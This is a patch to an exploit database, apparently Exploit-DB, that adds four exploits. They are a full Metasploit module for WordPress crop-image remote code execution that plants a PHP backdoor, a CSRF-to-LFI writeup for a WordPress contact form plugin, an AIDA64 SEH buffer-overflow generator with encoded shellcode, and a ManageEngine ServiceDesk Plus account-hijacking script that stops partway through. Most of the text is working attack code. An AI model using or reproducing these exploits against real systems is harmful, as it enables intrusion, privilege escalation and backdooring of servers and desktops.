From d1b8d5e1153b1551237030dfa5812d8569528816 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 6 Apr 2019 05:02:01 +0000 Subject: [PATCH] DB: 2019-04-06 4 changes to exploits/shellcodes AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow WordPress 5.0.0 - Crop-image Shell Upload (Metasploit) Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery --- exploits/php/remote/46662.rb | 455 ++++++++++++++++++++++++++++++ exploits/php/webapps/46661.html | 141 +++++++++ exploits/windows/local/46660.py | 91 ++++++ exploits/windows/webapps/46659.py | 180 ++++++++++++ files_exploits.csv | 4 + 5 files changed, 871 insertions(+) create mode 100755 exploits/php/remote/46662.rb create mode 100644 exploits/php/webapps/46661.html create mode 100755 exploits/windows/local/46660.py create mode 100755 exploits/windows/webapps/46659.py diff --git a/exploits/php/remote/46662.rb b/exploits/php/remote/46662.rb new file mode 100755 index 000000000..a64481723 --- /dev/null +++ b/exploits/php/remote/46662.rb @@ -0,0 +1,455 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HTTP::Wordpress + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress Crop-image Shell Upload', + 'Description' => %q{ + This module exploits a path traversal and a local file inclusion + vulnerability on WordPress versions 5.0.0 and <= 4.9.8. + The crop-image function allows a user, with at least author privileges, + to resize an image and perform a path traversal by changing the _wp_attached_file + reference during the upload. The second part of the exploit will include + this image in the current theme by changing the _wp_page_template attribute + when creating a post. + + This exploit module only works for Unix-based systems currently. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'RIPSTECH Technology', # Discovery + 'Wilfried Becard ' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-8942' ], + [ 'CVE', '2019-8943' ], + [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/'] + ], + 'DisclosureDate' => 'Feb 19 2019', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['WordPress', {}]], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), + OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) + ]) + end + + def check + cookie = wordpress_login(username, password) + if cookie.nil? + store_valid_credential(user: username, private: password, proof: cookie) + return CheckCode::Safe + end + + CheckCode::Appears + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def get_wpnonce(cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie + ) + if res && res.code == 200 && res.body && !res.body.empty? + res.get_hidden_inputs.first["_wpnonce"] + end + end + + def get_wpnonce2(image_id, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'post' => image_id, + 'action' => "edit" + } + ) + if res && res.code == 200 && res.body && !res.body.empty? + tmp = res.get_hidden_inputs + wpnonce2 = tmp[1].first[1] + end + end + + def get_current_theme + uri = normalize_uri(datastore['TARGETURI']) + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => uri + ) + fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty? + + theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first + fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme + + theme + end + + def get_ajaxnonce(cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => 'query-attachments', + 'post_id' => '0', + 'query[item]' => '43', + 'query[orderby]' => 'date', + 'query[order]' => 'DESC', + 'query[posts_per_page]' => '40', + 'query[paged]' => '1' + } + ) + fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty? + a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce + + a_nonce + end + + def upload_file(img_name, wp_nonce, cookie) + img_data = %w[ + FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F + 74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00 + 10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00 + 3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69 + 6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D + 20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09 + 08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D + 27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06 + 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 + 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 + 24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF + C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 + 07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01 + 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1 + 15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38 + 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73 + 74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4 + A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4 + D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF + C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 + 07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 + 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09 + 23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37 + 38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A + 73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 + A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 + D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF + DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B + 3F 3E + ] + img_data = [img_data.join].pack('H*') + img_name += '.jpg' + + boundary = "#{rand_text_alphanumeric(rand(10) + 5)}" + post_data = "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"name\"\r\n" + post_data << "\r\n#{img_name}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"action\"\r\n" + post_data << "\r\nupload-attachment\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + post_data << "\r\n#{wp_nonce}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n" + post_data << "Content-Type: image/jpeg\r\n" + post_data << "\r\n#{img_data}\r\n" + post_data << "--#{boundary}--\r\n" + print_status("Uploading payload") + upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php') + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => upload_uri, + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'cookie' => cookie + ) + fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty? + print_good("Image uploaded") + res = JSON.parse(res.body) + image_id = res["data"]["id"] + update_nonce = res["data"]["nonces"]["update"] + filename = res["data"]["filename"] + return filename, image_id, update_nonce + end + + def image_editor(img_name, ajax_nonce, image_id, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => 'image-editor', + '_ajax_nonce' => ajax_nonce, + 'postid' => image_id, + 'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]', + 'target' => 'all', + 'context' => '', + 'do' => 'save' + } + ) + fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty? + filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename + + filename << '.jpg' + end + + def change_path(wpnonce2, image_id, filename, current_date, path, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + '_wpnonce' => wpnonce2, + 'action' => 'editpost', + 'post_ID' => image_id, + 'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}" + } + ) + end + + def crop_image(image_id, ajax_nonce, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => 'crop-image', + '_ajax_nonce' => ajax_nonce, + 'id' => image_id, + 'cropDetails[x1]' => 0, + 'cropDetails[y1]' => 0, + 'cropDetails[width]' => 400, + 'cropDetails[height]' => 300, + 'cropDetails[dst_width]' => 400, + 'cropDetails[dst_height]' => 300 + } + ) + end + + def include_theme(shell_name, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie + ) + if res && res.code == 200 && res.body && !res.body.empty? + wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first + post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id + + post_title = Rex::Text.rand_text_alpha(10) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + '_wpnonce'=> wpnonce2, + 'action' => 'editpost', + 'post_ID' => post_id, + 'post_title' => post_title, + 'post_name' => post_title, + 'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg" + } + ) + fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302 + post_id + end + end + + def check_for_base64(cookie, post_id) + uri = normalize_uri(datastore['TARGETURI']) + # Test if base64 is on target + test_string = 'YmFzZTY0c3BvdHRlZAo=' + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => post_id, + '0' => "echo #{test_string} | base64 -d" + } + ) + fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty? + + fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted") + # Execute payload with base64 decode + @backdoor = Rex::Text.rand_text_alpha(10) + encoded = Rex::Text.encode_base64(payload.encoded) + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => post_id, + '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" + } + ) + + fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty? + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"), + 'cookie' => cookie + ) + end + + def wp_cleanup(shell_name, post_id, cookie) + print_status('Attempting to clean up files...') + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { 'action' => "query-attachments" } + ) + + fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty? + infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten + id1, id2, id3 = infos[0], infos[2], infos[4] + delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5] + for i in (0...6).step(2) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => "delete-post", + 'id' => infos[i], + '_wpnonce' => infos[i+1] + } + ) + end + + uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie + ) + + if res && res.code == 200 && res.body && !res.body.empty? + post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce + uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri2, + 'cookie' => cookie, + 'vars_get' => { + 'post' => post_id, + 'action' => 'trash', + '_wpnonce' => post_nonce + } + ) + + fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302 + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie, + 'vars_get' => { + 'post_status' => "trash", + 'post_type' => 'post', + '_wpnonce' => post_nonce + } + ) + + if res && res.code == 200 && res.body && !res.body.empty? + nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce + + send_request_cgi( + 'method' => 'GET', + 'uri' => uri2, + 'cookie' => cookie, + 'vars_get' => { + 'post' => post_id, + 'action' => 'delete', + '_wpnonce' => nonce + } + ) + end + end + end + + def exploit + fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? + + print_status("Authenticating with WordPress using #{username}:#{password}...") + cookie = wordpress_login(username, password) + fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? + print_good("Authenticated with WordPress") + store_valid_credential(user: username, private: password, proof: cookie) + + print_status("Preparing payload...") + @current_theme = get_current_theme + wp_nonce = get_wpnonce(cookie) + @current_date = Time.now.strftime("%Y/%m/") + + img_name = Rex::Text.rand_text_alpha(10) + @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie) + ajax_nonce = get_ajaxnonce(cookie) + + @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie) + wpnonce2 = get_wpnonce2(image_id, cookie) + + change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie) + crop_image(image_id, ajax_nonce, cookie) + + @shell_name = Rex::Text.rand_text_alpha(10) + change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie) + crop_image(image_id, ajax_nonce, cookie) + + print_status("Including into theme") + post_id = include_theme(@shell_name, cookie) + + check_for_base64(cookie, post_id) + wp_cleanup(@shell_name, post_id, cookie) + end + + def on_new_session(client) + client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*") + client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*") + client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*") + client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg") + client.shell_command_token("rm #{@backdoor}.php") + end +end \ No newline at end of file diff --git a/exploits/php/webapps/46661.html b/exploits/php/webapps/46661.html new file mode 100644 index 000000000..bdf077bc1 --- /dev/null +++ b/exploits/php/webapps/46661.html @@ -0,0 +1,141 @@ +# Exploit Title: Contact Form by WD [CSRF → LFI] +# Date: 2019-03-17 +# Exploit Author: Panagiotis Vagenas +# Vendor Homepage: http://web-dorado.com/ +# Software Link: https://wordpress.org/plugins/contact-form-maker +# Version: 1.13.1 +# Tested on: WordPress 5.1.1 + +Description +----------- + +Plugin implements the following AJAX actions: + +- `manage_fm` +- `get_stats` +- `generete_csv` +- `generete_xml` +- `formmakerwdcaptcha` +- `nopriv_formmakerwdcaptcha` +- `formmakerwdmathcaptcha` +- `nopriv_formmakerwdmathcaptcha` +- `product_option` +- `FormMakerEditCountryinPopup` +- `FormMakerMapEditinPopup` +- `FormMakerIpinfoinPopup` +- `show_matrix` +- `FormMakerSubmits` +- `FormMakerSQLMapping` +- `select_data_from_db` +- `manage` + +All of them call the function `form_maker_ajax_fmc`. This function +dynamicaly loads a file defined in `$_GET['action']` or +`$_POST['action']` if the former is not defined. Because of the way +WordPress defines the AJAX action a user could define the plugin action +in the `$_GET['action']` and AJAX action in `$_POST['action']`. +Leveraging that and the fact that no sanitization is performed on the +`$_GET['action']`, a malicious actor can perform a CSRF attack to load a +file using directory traversal thus leading to Local File Inclusion +vulnerability. + +The following AJAX actions are available only for the paid version of +the plugin: + +- `paypal_info` +- `checkpaypal` +- `nopriv_checkpaypal` +- `get_frontend_stats` +- `nopriv_get_frontend_stats` +- `frontend_show_map` +- `nopriv_frontend_show_map` +- `frontend_show_matrix` +- `nopriv_frontend_show_matrix` +- `frontend_paypal_info` +- `nopriv_frontend_paypal_info` +- `frontend_generate_csv` +- `nopriv_frontend_generate_csv` +- `frontend_generate_xml` +- `nopriv_frontend_generate_xml` +- `FMShortocde` +- `wd_bp_dismiss` + +In both free and paid versions, there are no-privilege actions that can +be exploited by unauthenticated users in order to include local files. + +PoC +--- + +```html +
+ + +
+ +``` \ No newline at end of file diff --git a/exploits/windows/local/46660.py b/exploits/windows/local/46660.py new file mode 100755 index 000000000..d67dc7d5a --- /dev/null +++ b/exploits/windows/local/46660.py @@ -0,0 +1,91 @@ +#!/usr/bin/python # +# Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow # +# Date: 2019-04-02 # +# Vendor Homepage: https://www.aida64.com # +# Software Link: http://download.aida64.com/aida64extreme599.exe # +# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe # +# Exploit Author: Peyman Forouzan # +# Tested Version: 5.99.4900 # +# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit # +# Special Thanks to my wife # +# Steps : # +# 1- Run python code : Aida64-Extreme.py ( Two files are created ) # +# 2- App --> File --> Preferences --> Hardware Monitoring --> Logging --> paste in contents from the # +# exploit-x32.txt or exploit-x64.txt (depend on your windows version) # +# into "Log sensor reading to CSV log file : " --> OK # +# 3- File --> Exit (Do not directly close the program window, If you want to do this, # +# some codes must be changed - See the comments in code) # +# --> Shellcode (Calc) open # +#---------------------------------------------------------------------------------------------------------# +bufsize1 = 1120 # for windows-x32 +#bufsize1 = 1088 # for windows-x32 - if you directly close the program window +bufsize2 = 1114 # for windows-x64 +#bufsize2 = 1082 # for windows-x64 - if you directly close the program window + +#msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f python -a x86 --platform windows -v calc +calc = "" +calc += "\x89\xe2\xdb\xd5\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49" +calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6d\x38\x6f" +calc += "\x72\x35\x50\x75\x50\x45\x50\x45\x30\x4c\x49\x79\x75" +calc += "\x64\x71\x49\x50\x52\x44\x4e\x6b\x70\x50\x64\x70\x6c" +calc += "\x4b\x31\x42\x44\x4c\x4e\x6b\x73\x62\x57\x64\x4e\x6b" +calc += "\x71\x62\x44\x68\x56\x6f\x78\x37\x32\x6a\x31\x36\x45" +calc += "\x61\x39\x6f\x6c\x6c\x45\x6c\x30\x61\x33\x4c\x65\x52" +calc += "\x44\x6c\x47\x50\x49\x51\x7a\x6f\x46\x6d\x37\x71\x4a" +calc += "\x67\x39\x72\x78\x72\x46\x32\x32\x77\x4c\x4b\x43\x62" +calc += "\x76\x70\x4c\x4b\x43\x7a\x47\x4c\x4e\x6b\x52\x6c\x62" +calc += "\x31\x52\x58\x4a\x43\x51\x58\x37\x71\x68\x51\x70\x51" +calc += "\x6e\x6b\x36\x39\x45\x70\x75\x51\x7a\x73\x4c\x4b\x42" +calc += "\x69\x45\x48\x5a\x43\x36\x5a\x37\x39\x4e\x6b\x56\x54" +calc += "\x6e\x6b\x73\x31\x4a\x76\x74\x71\x59\x6f\x4c\x6c\x69" +calc += "\x51\x5a\x6f\x44\x4d\x77\x71\x48\x47\x64\x78\x79\x70" +calc += "\x33\x45\x79\x66\x34\x43\x53\x4d\x5a\x58\x75\x6b\x51" +calc += "\x6d\x76\x44\x63\x45\x79\x74\x51\x48\x4c\x4b\x30\x58" +calc += "\x31\x34\x65\x51\x38\x53\x53\x56\x6e\x6b\x34\x4c\x30" +calc += "\x4b\x6e\x6b\x46\x38\x57\x6c\x63\x31\x49\x43\x4e\x6b" +calc += "\x34\x44\x6e\x6b\x35\x51\x38\x50\x6e\x69\x30\x44\x34" +calc += "\x64\x35\x74\x31\x4b\x63\x6b\x45\x31\x73\x69\x63\x6a" +calc += "\x62\x71\x39\x6f\x6b\x50\x33\x6f\x53\x6f\x52\x7a\x4e" +calc += "\x6b\x72\x32\x38\x6b\x6c\x4d\x53\x6d\x32\x4a\x43\x31" +calc += "\x6c\x4d\x6f\x75\x4c\x72\x45\x50\x77\x70\x67\x70\x76" +calc += "\x30\x42\x48\x35\x61\x6c\x4b\x30\x6f\x4c\x47\x49\x6f" +calc += "\x59\x45\x4f\x4b\x38\x70\x4e\x55\x4e\x42\x36\x36\x65" +calc += "\x38\x6d\x76\x4c\x55\x4d\x6d\x6f\x6d\x79\x6f\x39\x45" +calc += "\x55\x6c\x55\x56\x73\x4c\x74\x4a\x4f\x70\x39\x6b\x6b" +calc += "\x50\x53\x45\x47\x75\x4d\x6b\x43\x77\x54\x53\x31\x62" +calc += "\x50\x6f\x61\x7a\x77\x70\x32\x73\x39\x6f\x48\x55\x45" +calc += "\x33\x73\x51\x50\x6c\x65\x33\x36\x4e\x53\x55\x62\x58" +calc += "\x63\x55\x53\x30\x41\x41" + +jmpback1 = "\xe9\xa0\xfb\xff\xff" # Jmp back +#jmpback1 = "\xe9\xc0\xfb\xff\xff" # Jmp back - if you directly close the program window +jmpback2 = "\xe9\xa6\xfb\xff\xff" # Jmp back +#jmpback2 = "\xe9\xc6\xfb\xff\xff" # Jmp back- if you directly close the program window + +nseh = "\xeb\xf9\x90\x90" # Jmp Short back +seh = "\x02\xeb\x1a\x01" # Overwrite Seh # 0x011aeb02 : {pivot 8} + +buffer = calc +buffer += "\x41" * (bufsize1-len(buffer)-len(jmpback1)) +buffer += jmpback1 +buffer += nseh +buffer += seh +print "[+] Creating %s bytes payload for windows-x32 ..." %len(buffer) +f = open ("exploit-x32.txt", "w") +print "[+] File created!" +f.write(buffer) +f.close() + +buffer = calc +buffer += "\x41" * (bufsize2-len(buffer)-len(jmpback2)) +buffer += jmpback2 +buffer += nseh +buffer += seh +print "[+] Creating %s bytes payload for windows-x64 ..." %len(buffer) +f = open ("exploit-x64.txt", "w") +print "[+] File created!" +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/webapps/46659.py b/exploits/windows/webapps/46659.py new file mode 100755 index 000000000..f41dde33b --- /dev/null +++ b/exploits/windows/webapps/46659.py @@ -0,0 +1,180 @@ +#!/usr/bin/python + +# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking +# Date: 30-03-2019 +# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız +# Vendor: ManageEngine +# Vendor Homepage: www.manageengine.com +# Product: Service Desk Plus +# Version: 9.3 +# Tested On: Windows 10 64 bit +# CVE : 2019-10008 + + +# How to use: Change the host, low_username, low_password and high_username variables depending on what you have. +# Low username and password is an account you have access to. high_username is account you want to authenticate as. + +# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password. +# Run this script on a Linux OS. + +#Host ip address + port +host="localhost:8080" + +#set to https if needed +url = "http://" + host + +#Username with credentials you have +low_username="guest" +low_password="guest" + +#username you want to login as +high_username="administrator" + + + + + +print("\033[1;37mUrl: \033[1;32m" + url) +print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password) +print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username) + + +print("\033[1;32mGetting a session id\033[1;37m") + +# Get index page to capture a session id +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("Sessid:") +print(sessid) + + +print("\033[1;31mLogging in with low privilege user\033[1;37m") + + +#Attempt login post request +curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\ + hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\ + dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \ + $'"+url+"/j_security_check'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + + +#Instead of following redirects with -L, following manually because we don't need all the transactions. +curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;32mCaptured authenticated cookies.\033[1;37m") +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +print(sessid) +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] +print(sessidsso) +grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out) + +grbl2 = [] +for cookie in grbl: + cl = cookie.split('=') + if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem': + + grbl2.append(cl[0]) + grbl2.append(cl[1]) + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("\033[1;32mCaptured secondary sessid.\033[1;37m") +print(sessid2) + + +print("\033[1;31mDoing the magic step 1.\033[1;37m") +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/WOListView.do' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + 